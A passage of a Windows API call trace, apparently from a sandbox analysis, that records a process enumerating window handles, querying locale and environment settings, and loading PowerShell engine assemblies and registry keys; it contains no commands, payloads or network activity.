	[0479.023] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x790
	[0479.023] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x61c
	[0479.023] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x540
	[0479.023] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x538
	[0479.024] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x568
	[0479.024] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x538
	[0479.024] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x568
	[0479.024] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x538
	[0479.024] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x540
	[0479.024] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x540
	[0479.024] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x57c
	[0479.024] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x460
	[0479.024] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x554
	[0479.025] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.025] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x528
	[0479.025] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.025] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.025] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.025] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x79c
	[0479.025] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.025] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4e0
	[0479.025] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.026] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x460
	[0479.026] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x460
	[0479.026] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x44c
	[0479.026] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x778
	[0479.026] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x460
	[0479.026] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x558
	[0479.026] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.026] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x4d0
	[0479.026] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x128c
	[0479.027] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x16e8
	[0479.027] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x16cc
	[0479.027] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x274
	[0479.027] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x10e0
	[0479.027] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x10cc
	[0479.027] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x10c0
	[0479.027] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x10d0
	[0479.027] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1198
	[0479.028] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1080
	[0479.028] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1074
	[0479.028] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x106c
	[0479.028] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1474
	[0479.028] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1414
	[0479.028] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xbd0
	[0479.028] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x550
	[0479.028] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xa38
	[0479.029] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x16d0
	[0479.029] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x16d4
	[0479.029] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x15bc
	[0479.029] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x15a0
	[0479.029] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x159c
	[0479.029] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1598
	[0479.029] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1594
	[0479.029] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1590
	[0479.029] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x158c
	[0479.030] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1588
	[0479.030] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1584
	[0479.030] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1580
	[0479.030] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x157c
	[0479.030] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1488
	[0479.030] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x1404
	[0479.030] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x11b8
	[0479.030] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xbd4
	[0479.031] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xe0c
	[0479.031] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xd30
	[0479.031] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xe70
	[0479.031] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x13b8
	[0479.031] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xe20
	[0479.031] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xe2c
	[0479.031] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xe00
	[0479.031] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xe04
	[0479.031] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0xc94
	[0479.032] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x13b0
	[0479.032] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x13ac
	[0479.032] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x12d960 | out: lpdwProcessId=0x12d960) returned 0x13a8
	[0480.214] WerSetFlags () returned 0x0
	[0480.222] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0480.222] CoTaskMemFree (pv=0x0) 
	[0480.223] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12dcc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12dcc0 | out: pulNumLanguages=0x12dcc8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12dcc0) returned 1
	[0480.224] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12dcc8, pwszLanguagesBuffer=0x2d33738, pcchLanguagesBuffer=0x12dcc0 | out: pulNumLanguages=0x12dcc8, pwszLanguagesBuffer=0x2d33738, pcchLanguagesBuffer=0x12dcc0) returned 1
	[0480.229] CoTaskMemAlloc (cb=0x24) returned 0x361ed0
	[0480.229] GetUserDefaultLocaleName (in: lpLocaleName=0x361ed0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0480.229] CoTaskMemFree (pv=0x361ed0) 
	[0481.237] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0481.237] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.237] CoTaskMemFree (pv=0x2c1aa0) 
	[0481.239] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0481.239] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.239] CoTaskMemFree (pv=0x2c1aa0) 
	[0481.241] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0481.241] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.241] CoTaskMemFree (pv=0x2c1aa0) 
	[0481.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.254] SetErrorMode (uMode=0x1) returned 0x1
	[0481.255] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x12d940 | out: lpFileInformation=0x12d940*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0481.255] SetErrorMode (uMode=0x1) returned 0x1
	[0481.255] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x12dbb0 | out: lpdwHandle=0x12dbb0) returned 0x94c
	[0481.256] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2d36fc8 | out: lpData=0x2d36fc8) returned 1
	[0481.257] VerQueryValueW (in: pBlock=0x2d36fc8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12db28, puLen=0x12db20 | out: lplpBuffer=0x12db28*=0x2d37064, puLen=0x12db20) returned 1
	[0481.257] VerQueryValueW (in: pBlock=0x2d36fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x12da98, puLen=0x12da90 | out: lplpBuffer=0x12da98*=0x2d37140, puLen=0x12da90) returned 1
	[0481.257] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0481.257] CoTaskMemAlloc (cb=0x2e) returned 0x36ce10
	[0481.257] lstrcpyW (in: lpString1=0x36ce10, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0481.257] CoTaskMemFree (pv=0x36ce10) 
	[0481.257] VerQueryValueW (in: pBlock=0x2d36fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x12da98, puLen=0x12da90 | out: lplpBuffer=0x12da98*=0x2d37194, puLen=0x12da90) returned 1
	[0481.257] lstrlenW (lpString="System.Management.Automation") returned 28
	[0481.257] CoTaskMemAlloc (cb=0x3c) returned 0x369b30
	[0481.257] lstrcpyW (in: lpString1=0x369b30, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0481.257] CoTaskMemFree (pv=0x369b30) 
	[0481.257] VerQueryValueW (in: pBlock=0x2d36fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x12da98, puLen=0x12da90 | out: lplpBuffer=0x12da98*=0x2d371f0, puLen=0x12da90) returned 1
	[0481.257] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0481.257] CoTaskMemAlloc (cb=0x20) returned 0x366d60
	[0481.257] lstrcpyW (in: lpString1=0x366d60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0481.257] CoTaskMemFree (pv=0x366d60) 
	[0481.257] VerQueryValueW (in: pBlock=0x2d36fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x12da98, puLen=0x12da90 | out: lplpBuffer=0x12da98*=0x2d37230, puLen=0x12da90) returned 1
	[0481.258] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0481.258] CoTaskMemAlloc (cb=0x44) returned 0x369b30
	[0481.258] lstrcpyW (in: lpString1=0x369b30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0481.258] CoTaskMemFree (pv=0x369b30) 
	[0481.258] VerQueryValueW (in: pBlock=0x2d36fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x12da98, puLen=0x12da90 | out: lplpBuffer=0x12da98*=0x2d37298, puLen=0x12da90) returned 1
	[0481.258] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0481.258] CoTaskMemAlloc (cb=0x76) returned 0x2fd6d0
	[0481.258] lstrcpyW (in: lpString1=0x2fd6d0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0481.258] CoTaskMemFree (pv=0x2fd6d0) 
	[0481.258] VerQueryValueW (in: pBlock=0x2d36fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12da98, puLen=0x12da90 | out: lplpBuffer=0x12da98*=0x2d37334, puLen=0x12da90) returned 1
	[0481.258] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0481.258] CoTaskMemAlloc (cb=0x44) returned 0x369b30
	[0481.258] lstrcpyW (in: lpString1=0x369b30, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0481.258] CoTaskMemFree (pv=0x369b30) 
	[0481.258] VerQueryValueW (in: pBlock=0x2d36fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12da98, puLen=0x12da90 | out: lplpBuffer=0x12da98*=0x2d37398, puLen=0x12da90) returned 1
	[0481.258] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0481.258] CoTaskMemAlloc (cb=0x58) returned 0x2b5d10
	[0481.258] lstrcpyW (in: lpString1=0x2b5d10, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0481.258] CoTaskMemFree (pv=0x2b5d10) 
	[0481.258] VerQueryValueW (in: pBlock=0x2d36fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12da98, puLen=0x12da90 | out: lplpBuffer=0x12da98*=0x2d37414, puLen=0x12da90) returned 1
	[0481.258] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0481.258] CoTaskMemAlloc (cb=0x20) returned 0x366d60
	[0481.258] lstrcpyW (in: lpString1=0x366d60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0481.258] CoTaskMemFree (pv=0x366d60) 
	[0481.259] VerQueryValueW (in: pBlock=0x2d36fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12da98, puLen=0x12da90 | out: lplpBuffer=0x12da98*=0x2d370bc, puLen=0x12da90) returned 1
	[0481.259] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0481.259] CoTaskMemAlloc (cb=0x66) returned 0x321360
	[0481.259] lstrcpyW (in: lpString1=0x321360, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0481.259] CoTaskMemFree (pv=0x321360) 
	[0481.259] VerQueryValueW (in: pBlock=0x2d36fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12da98, puLen=0x12da90 | out: lplpBuffer=0x12da98*=0x0, puLen=0x12da90) returned 0
	[0481.259] VerQueryValueW (in: pBlock=0x2d36fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12da98, puLen=0x12da90 | out: lplpBuffer=0x12da98*=0x0, puLen=0x12da90) returned 0
	[0481.259] VerQueryValueW (in: pBlock=0x2d36fc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12da98, puLen=0x12da90 | out: lplpBuffer=0x12da98*=0x0, puLen=0x12da90) returned 0
	[0481.259] VerQueryValueW (in: pBlock=0x2d36fc8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12da68, puLen=0x12da60 | out: lplpBuffer=0x12da68*=0x2d37064, puLen=0x12da60) returned 1
	[0481.259] CoTaskMemAlloc (cb=0x204) returned 0x301a20
	[0481.259] VerLanguageNameW (in: wLang=0x0, szLang=0x301a20, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0481.259] CoTaskMemFree (pv=0x301a20) 
	[0481.259] VerQueryValueW (in: pBlock=0x2d36fc8, lpSubBlock="\\", lplpBuffer=0x12dab8, puLen=0x12dab0 | out: lplpBuffer=0x12dab8*=0x2d36ff0, puLen=0x12dab0) returned 1
	[0481.268] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0481.268] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.268] CoTaskMemFree (pv=0x2c1aa0) 
	[0481.273] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0481.273] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0481.273] CoTaskMemFree (pv=0x2c1aa0) 
	[0481.277] lstrlenW (lpString="䅁") returned 1
	[0482.128] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d988 | out: phkResult=0x12d988*=0x308) returned 0x0
	[0482.130] RegOpenKeyExW (in: hKey=0x308, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d978 | out: phkResult=0x12d978*=0x30c) returned 0x0
	[0482.130] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12da08 | out: phkResult=0x12da08*=0x310) returned 0x0
	[0482.135] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d94c, lpData=0x0, lpcbData=0x12d948*=0x0 | out: lpType=0x12d94c*=0x1, lpData=0x0, lpcbData=0x12d948*=0x56) returned 0x0
	[0482.136] CoTaskMemAlloc (cb=0x5a) returned 0x3212f0
	[0482.136] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d91c, lpData=0x3212f0, lpcbData=0x12d918*=0x56 | out: lpType=0x12d91c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d918*=0x56) returned 0x0
	[0482.136] CoTaskMemFree (pv=0x3212f0) 
	[0482.143] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0482.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0482.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0482.933] CoTaskMemAlloc (cb=0x104) returned 0x2c1aa0
	[0482.933] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1aa0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0482.933] CoTaskMemFree (pv=0x2c1aa0) 
	[0486.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0486.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0488.696] CoTaskMemAlloc (cb=0x104) returned 0x2c1bb0
	[0488.696] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1bb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.696] CoTaskMemFree (pv=0x2c1bb0) 
	[0488.697] CoTaskMemAlloc (cb=0x104) returned 0x2c1bb0
	[0488.697] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1bb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.697] CoTaskMemFree (pv=0x2c1bb0) 
	[0489.556] CoTaskMemAlloc (cb=0x104) returned 0x2c1bb0
	[0489.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1bb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0489.556] CoTaskMemFree (pv=0x2c1bb0) 
	[0489.557] CoTaskMemAlloc (cb=0x104) returned 0x2c1bb0
	[0489.557] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1bb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0489.558] CoTaskMemFree (pv=0x2c1bb0) 
	[0489.558] CoTaskMemAlloc (cb=0x104) returned 0x2c1bb0
	[0489.558] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c1bb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0489.558] CoTaskMemFree (pv=0x2c1bb0) 
	[0491.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
